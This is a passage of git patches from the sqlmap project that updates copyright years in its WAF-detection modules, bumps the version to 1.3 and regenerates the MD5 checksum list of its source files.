python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/paloalto.py b/waf/paloalto.py index 095006fbed9..b23892a2c2d 100644 --- a/waf/paloalto.py +++ b/waf/paloalto.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/profense.py b/waf/profense.py index fef24231b82..85ad6d22e14 100644 --- a/waf/profense.py +++ b/waf/profense.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/proventia.py b/waf/proventia.py index d59f23b5713..3aca6a3d66c 100644 --- a/waf/proventia.py +++ b/waf/proventia.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/radware.py b/waf/radware.py index 42642136dc0..560a50fe1b7 100644 --- a/waf/radware.py +++ b/waf/radware.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/reblaze.py b/waf/reblaze.py index 6226f4fca7f..a5a6a7936c1 100644 --- a/waf/reblaze.py +++ b/waf/reblaze.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/requestvalidationmode.py b/waf/requestvalidationmode.py index 5e1ce590d97..ec651de899a 100644 --- a/waf/requestvalidationmode.py +++ b/waf/requestvalidationmode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/safe3.py b/waf/safe3.py index 2d4a294c009..2ed28a06529 100644 --- a/waf/safe3.py +++ b/waf/safe3.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/safedog.py b/waf/safedog.py index aabbabcbe43..2e0f8fd0b32 100644 --- a/waf/safedog.py +++ b/waf/safedog.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/secureiis.py b/waf/secureiis.py index be22a0a58de..b9b3f48397f 100644 --- a/waf/secureiis.py +++ b/waf/secureiis.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/senginx.py b/waf/senginx.py index 80c5cf0a52f..33c3c6d8f3e 100644 --- a/waf/senginx.py +++ b/waf/senginx.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/sitelock.py b/waf/sitelock.py index e17b67c620e..03eb231d1d5 100644 --- a/waf/sitelock.py +++ b/waf/sitelock.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/sonicwall.py b/waf/sonicwall.py index f87d9c40c6f..49a54503183 100644 --- a/waf/sonicwall.py +++ b/waf/sonicwall.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/sophos.py b/waf/sophos.py index ea7e83658e3..5ff97abf1d0 100644 --- a/waf/sophos.py +++ b/waf/sophos.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/stingray.py b/waf/stingray.py index 896ba765e47..bdbda8edf3a 100644 --- a/waf/stingray.py +++ b/waf/stingray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/sucuri.py b/waf/sucuri.py index 636008f74d2..33cf57a7078 100644 --- a/waf/sucuri.py +++ b/waf/sucuri.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/tencent.py b/waf/tencent.py index fd8a7ba079f..d5dfed212f9 100644 --- a/waf/tencent.py +++ b/waf/tencent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/teros.py b/waf/teros.py index 2516454709e..1d4c8019da7 100644 --- a/waf/teros.py +++ b/waf/teros.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/trafficshield.py b/waf/trafficshield.py index 9a67c36d9e4..a2b830eed38 100644 --- a/waf/trafficshield.py +++ b/waf/trafficshield.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/urlscan.py b/waf/urlscan.py index 3f044c76bd6..e3206c33a61 100644 --- a/waf/urlscan.py +++ b/waf/urlscan.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/uspses.py b/waf/uspses.py index bc26c1efdbe..7f857240e27 100644 --- a/waf/uspses.py +++ b/waf/uspses.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/varnish.py b/waf/varnish.py index 8617cd802d7..946e1271396 100644 --- a/waf/varnish.py +++ b/waf/varnish.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/wallarm.py b/waf/wallarm.py index 9ad1f46c6a8..3c98c436ace 100644 --- a/waf/wallarm.py +++ b/waf/wallarm.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/watchguard.py b/waf/watchguard.py index f6c63e4ac1b..bb40d49d97b 100644 --- a/waf/watchguard.py +++ b/waf/watchguard.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/webappsecure.py b/waf/webappsecure.py index 5eb0e2e4f01..e966302c0db 100644 --- a/waf/webappsecure.py +++ b/waf/webappsecure.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/webknight.py b/waf/webknight.py index 54abfa8aca4..7fbdc6f7b27 100644 --- a/waf/webknight.py +++ b/waf/webknight.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/wordfence.py b/waf/wordfence.py index dadb8151fa4..40a6711687f 100644 --- a/waf/wordfence.py +++ b/waf/wordfence.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/yundun.py b/waf/yundun.py index ede324f0a05..e9b57cac4ca 100644 --- a/waf/yundun.py +++ b/waf/yundun.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/yunsuo.py b/waf/yunsuo.py index fd0b9b36944..d51da493558 100644 --- a/waf/yunsuo.py +++ b/waf/yunsuo.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/waf/zenedge.py b/waf/zenedge.py index b5b3e0fb39c..d15ca0fc341 100644 --- a/waf/zenedge.py +++ b/waf/zenedge.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ From 4c4de54ad8f0f0fe9ef13207927a5780b8e7353c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 Jan 2019 21:48:39 +0100 Subject: [PATCH 426/428] Prepare for 1.3 --- lib/core/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5f6f1e9e702..a25b3b6a72c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.49" +VERSION = "1.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) From 5957aad73843d6f3f00514d71628af890d3597a7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 Jan 2019 22:58:28 +0100 Subject: [PATCH 427/428] Update of checksums --- txt/checksum.md5 | 698 +++++++++++++++++++++++------------------------ 1 file changed, 349 insertions(+), 349 deletions(-) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6e7ab0bcb8e..c27c127756e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -1,230 +1,230 @@ -4cb52d99ae953f04fb0f17825b0dabc4 extra/beep/beep.py -1e5532ede194ac9c083891c2f02bca93 extra/beep/__init__.py -b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py -1e5532ede194ac9c083891c2f02bca93 extra/cloak/__init__.py -e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py -1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py +3d37032b2bd62ee37bd61c5b7ad31ab4 extra/beep/beep.py +fb6be55d21a70765e35549af2484f762 extra/beep/__init__.py +ed51a485d1badc99267f0d136bfb2a12 extra/cloak/cloak.py +fb6be55d21a70765e35549af2484f762 extra/cloak/__init__.py +6baecbea87de0a56f99e59bfe982ebc5 extra/dbgtool/dbgtool.py +fb6be55d21a70765e35549af2484f762 extra/dbgtool/__init__.py acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ 708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py -1e5532ede194ac9c083891c2f02bca93 extra/__init__.py +fb6be55d21a70765e35549af2484f762 extra/__init__.py ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ -1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py -b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py +fb6be55d21a70765e35549af2484f762 extra/safe2bin/__init__.py +f372fef397ba41ea54334c16ebe646b2 extra/safe2bin/safe2bin.py d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py +d1bf28af13f1017f4007f29ea86afd25 extra/shutils/duplicates.py e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py -1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py -1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py -b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py -1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -d2fe1ac374de3c2d7729152cb8c80ce8 extra/wafdetectify/wafdetectify.py -3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py -197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py -988b548f6578adf9cec17afdeee8291c lib/controller/handler.py -1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -e62309b22a59e60b270e62586f169441 lib/core/agent.py -c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -7272b591e710224c578071381e28c6c5 lib/core/common.py -0d082da16c388b3445e656e0760fb582 lib/core/convert.py -9f87391b6a3395f7f50830b391264f27 lib/core/data.py -72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -2e62f7c5e89442e5a76e6d797d54be2c lib/core/decorators.py -fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py -760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py -5b6999c4b78180961e9f33e172d4dd66 lib/core/enums.py -cada93357a7321655927fc9625b3bfec lib/core/exception.py -1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py -458a194764805cd8312c14ecd4be4d1e lib/core/log.py -7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -b75d17fef2c6675b53a8874484ea771f lib/core/option.py -c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -6783160150b4711d02c56ee2beadffdb lib/core/profiling.py -6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py -0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py -a7db43859b61569b601b97f187dd31c5 lib/core/revision.py -fcb74fcc9577523524659ec49e2e964b lib/core/session.py -029c708c75256a97c39c14e24e62ba08 lib/core/settings.py -a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py -a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -1581be48127a3a7a9fd703359b6e7567 lib/core/target.py -72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -cd0067d1798e45f422ce44b98baf57db lib/core/threads.py -c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -b35636650cfe721f5cc47fb91737c061 lib/core/update.py -e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py -1e5532ede194ac9c083891c2f02bca93 lib/__init__.py -7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -0f92bdaacd8210520bdd6e0c531c70cd lib/parse/cmdline.py -fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py -3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py -1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py -1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py -492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py -30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -67c035eda3066b44c592b2f602e44b3e lib/request/basic.py -859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -2fe9e5118553f9b2b37ca33d5f85a401 lib/request/connect.py -dd4598675027fae99f2e2475b05986da lib/request/direct.py -2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py -98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py -1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -a5cbc19ee18bd4b848515eb3ea3291f0 lib/request/inject.py -aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py -83c7a13e38ad5eedb6bb13463a7a9e90 lib/request/pkihandler.py -2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -3cd9d17fc52bb62db29e0e24fc4d8a97 lib/request/redirecthandler.py -7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py -747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py -acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py -1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -4bf186a747e1a0c4ed5127ef064c3920 lib/takeover/metasploit.py -fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py -6a49f359b922df0247eb236126596336 lib/takeover/udf.py -ce8524022df29602f3d6c3c41f938ad4 lib/takeover/web.py -debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py -db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py -799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py -48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -686904374067047b521151301321b30a lib/techniques/error/use.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -7047a66c35ce0c820931fc5bf73008a3 lib/techniques/union/test.py -1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py -fd1ede20ec674518a54966eaf0c9f8c6 lib/utils/api.py -37dfb641358669f62c2acedff241348b lib/utils/brute.py -31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py -f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py -f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py -7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py -1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py -eb2aa3fa9ebdf4cb6ac3e005f7df1e9b lib/utils/hash.py -011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py -1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py -683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py -0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -cede46255b3c8f8d0b425b1c72cac75a lib/utils/sqlalchemy.py -dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py -e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py -d8a541a63f3b561334de51abb4dcad55 plugins/dbms/access/connector.py -3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py -fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -cdd082981b421248ece0e7cf278071ff plugins/dbms/access/fingerprint.py -e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py -77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py -2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -24a79eb2dde8ea9340a701c8c2591701 plugins/dbms/db2/connector.py -4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py -da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -ce434fc05a7ad236c49a155d62f0cac4 plugins/dbms/db2/fingerprint.py -95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py -82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py -25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -1ac54bbfb81ffed945636432bc49466b plugins/dbms/firebird/connector.py -bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py -c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py -d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py -c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py -1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py -5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py -36522c36650afc43c1166ab68b297ecb plugins/dbms/h2/filesystem.py -83255ebf7b1d23a408f0c68a7fa63422 plugins/dbms/h2/fingerprint.py -1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py -4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py -af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py -271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py -95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py -7747ad6cc12e295ba3fb4518ac083d1e plugins/dbms/hsqldb/filesystem.py -b061bdbb9159c449072fde51b444f1c0 plugins/dbms/hsqldb/fingerprint.py -fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py -4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py -7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -d61a5f79a9fa07c06fe7f5a653662e95 plugins/dbms/informix/connector.py -c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py -da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py -b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py -9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py -aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py -25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py -1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py -9c0307881fae556521bec393956664b0 plugins/dbms/maxdb/connector.py -1f3f9d4c7ec62452ed2465cd9cf50aa1 plugins/dbms/maxdb/enumeration.py -ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py -9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py -4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py -e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py -bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -5e1c7e578d07f3670bba5d88d856715d plugins/dbms/mssqlserver/connector.py -f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py -65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py -6cf74341fc84588205e02b70b2f0f5b6 plugins/dbms/mssqlserver/fingerprint.py -f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py -612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -14bfa3960ed0b4bec2cd29800ec525b7 plugins/dbms/mysql/connector.py -445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -edec54520556a5eb66900fca697940ff plugins/dbms/mysql/filesystem.py -1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py -30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py -0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py -403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py -f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py -e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py -c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -85a5d474faaf14df5a5a84c9f232c1d6 plugins/dbms/oracle/fingerprint.py -9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py -5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py -bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py -f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py -7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py -c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -1449c89fa6dac9b62e814cc65233b9de plugins/dbms/postgresql/fingerprint.py -470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py -20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py -1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py -80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py -5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py -90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py -9b1f236857b8a64750e8662be21abb69 plugins/dbms/sqlite/fingerprint.py -f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py -964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py -3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py -9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -4fe9ee0dfa50e9c46e6512128471cbee plugins/dbms/sybase/enumeration.py -74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py -0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py -a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py -36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py -79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py -bdc159cc5afb28cadd980c01c43ba669 plugins/generic/connector.py -ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -3d75e831574c750ed58e24eaa562c056 plugins/generic/databases.py -35546acab0eea406c23b84363df4d534 plugins/generic/entries.py -d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py -f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py -1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py -f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py -a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -f990d799e578dfbc3cde5728655a7854 plugins/generic/takeover.py -8ab0b84fda105459913715b98e1b8a4a plugins/generic/users.py -1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py +11492e9b5f183c289b98442437675c1f extra/shutils/regressiontest.py +fb6be55d21a70765e35549af2484f762 extra/sqlharvest/__init__.py 